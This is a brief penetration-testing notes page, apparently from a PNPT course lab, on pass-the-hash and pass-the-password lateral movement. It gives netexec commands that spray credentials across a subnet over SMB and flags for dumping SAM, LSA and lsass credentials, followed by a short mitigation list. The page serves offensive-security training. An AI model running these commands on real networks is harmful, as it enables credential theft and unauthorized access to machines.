Pass the Hash

Overview

With a cracked a password and or dumped SAM hashes, we can use both of them for lateral movement by passing them around machines in the network.

If the password/hash is one of a Local Administrator, we can use secretsdump to dump out more hashes from other computers, crack those passwords and pass them around again.

Netexec is the tool that will be used for this attack and it even stores a database of all the findings of the attack.

Netexec

Pass the Password

netexec smb 192.168.1.0/24 -u greg -d PNPT.local -p Password1

Pass the Hash

netexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404e' --local-auth

Pass the Hash Variations

--sam        Dumps SAM 
--shares     Dumps shares being offered by the machine
--lsa        Dumps LSA hashes (cached credentials)
-M lsassy    Dumps lsassy (recent user logins)

View crackmapexec database

nxcdb

Database General Usage | NetExec

Mitigation

Limit account reuse
Don't reuse Local Administrator passwords
Disable Local Administrator and Guest accounts
Limit who is an Administrator
Strong password policy

PreviousDCOM NextPass the Ticket